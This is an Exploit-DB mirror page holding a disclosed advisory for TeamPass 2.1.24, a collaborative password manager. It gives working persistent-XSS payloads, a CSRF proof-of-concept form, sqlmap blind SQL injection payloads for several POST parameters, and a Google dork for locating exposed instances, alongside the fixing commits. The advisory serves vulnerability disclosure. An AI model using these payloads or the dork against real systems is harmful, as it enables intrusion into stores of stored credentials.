bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/39559.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

80 lines
No EOL
4.3 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Affected Product: TeamPass
Vulnerability Type: Multiple XSS,CSRF, SQL injections
Fixed in Version: 2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)
Vendor Website: http://www.teampass.net
Software Link: : https://github.com/nilsteampassnet/TeamPass
Affected Version: 2.1.24 and prior
Vulnerable software (including source) : https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4
Google Dork: intitle:"Teampass" + inurl:index.php?page=items
Tested on: Ubuntu
Remote Exploitable: Yes
Reported to vendor: 30 december 2015
Disclosed to public: 14 March 2016
Release mode: Responsible Disclosure
CVE-2015-7562 TeamPass 2.1.24 Persistant XSS
CVE-2015-7563 TeamPass 2.1.24 CSRF
CVE-2015-7564 TeamPass 2.1.24 SQL Injection
Credits: Vincent Malguy
Description :
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the users role.
Copyright (c) 2009-2015, Nils Laumaillé
********************* CVE-2015-7562 TeamPass 2.1.24 Persistant XSS *********************
When displaying the detail of an item (a password entry), the "label" value is display using the stripslashes() sanitization function. This function does not efficiently prevent XSS.
POC of a persistant XSS : add item with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='". strip_tags($str) ."'></a>";
This xss will be trigger each time a user click on this item.
As item can be share, there is a way for a user to trick an admin to trigger this xss.
fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
POC of a persistant XSS :
Add a new role with name : <script>alert("XSS");</script>
This xss will be trigger in many admin pages
Fix in commit : 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
********************* CVE-2015-7563 TeamPass 2.1.24 CSRF *********************
Lack of anti-CSRF token lead to security vulnerabilities where an attacker can trick a authenticated user to do some unwanted action on his behalf :
<form action="http://<teampass host>/sources/main.queries.php" method="post">
<select name="type">
<option value="increase_session_time »>will add 1 hour timeout to the user session</option>
</select>
<input type=submit>
</form>
recommanded fix: add anti-CSRF token.
********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections *********************
SQL injection has been found in item.query.php parameter id with type set to action_on_quick_icon.
Sqlmap output :
---
Parameter: id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1
fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
SQL injections has been found in view.query.php in parameters order and direction with type set to connections_logs, errors_logs or access_logs .
Note that direction need to be prefixed by ", " in order to be exploitable
Sqlmap output for connections_logs:
---
Parameter: order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC
---
Parameter: direction (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=errors_logs&order=date&direction=, (SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
fix commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
Reference in a new issue View git blame Copy permalink